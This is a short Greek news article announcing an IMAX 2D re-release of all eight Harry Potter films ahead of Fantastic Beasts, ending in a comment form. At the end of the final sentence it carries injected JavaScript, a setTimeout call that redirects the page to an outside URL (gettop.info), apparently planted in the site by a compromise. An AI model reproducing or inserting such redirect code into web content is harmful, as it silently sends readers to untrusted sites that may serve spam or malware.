Καλά νέα για τους απανταχού φαν του Χάρι Πότερ

0
8

 

Κι ενώ όλοι οι φανατικοί του Χάρι Πότερ περιμένουν να δουν την ταινία Fantastic Beasts που θα βγει στις κινηματογραφικές αίθουσες τον Νοέμβριο, η Warner Bros, ανακοίνωσε ότι όλες οι ταινίες της κινηματογραφικής σειράς (οκτώ στο σύνολο) θα προβληθούν για πρώτη φορά σε IMAX 2D. Η επανακυκλοφορία των 8 ταινιών θα ξεκινήσει στις 13 Οκτωβρίου ταυτόχρονα σε πολλές μεγάλες πόλεις του κόσμου.

Τα εισιτήρια θα διατίθενται ενιαία, δηλαδή για προβολή μίας ημέρας (τέσσερις ταινίες την κάθε μέρα) ή συνολικά για όλη την εβδομάδα που μπορεί κανείς να δει όλες τις ταινίες όσες φορές θέλει.

Η όλη εκδήλωση θα ξεκινήσει με μία ειδική προβολή, όπου οι θαυμαστές θα έρθουν σε επαφή με τα νέα IMAX πλάνα στην ταινία Fantastic Beasts, μαζί με ένα ζωντανό διαδραστικό παιχνίδι με τους ηθοποιούς και τον σκηνοθέτη της ταινίας.

Επισημαίνεται ότι με την ταινία Fantastic Beasts, που είναι η πρώτη μιας τριλογίας, η συγγραφέας του βιβλίου και των βιβλίων Χάρι Πότερ, Τζ. Κ. Ρόουλινγκ κάνει το ντεμπούτο της ως σεναριογράφος setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here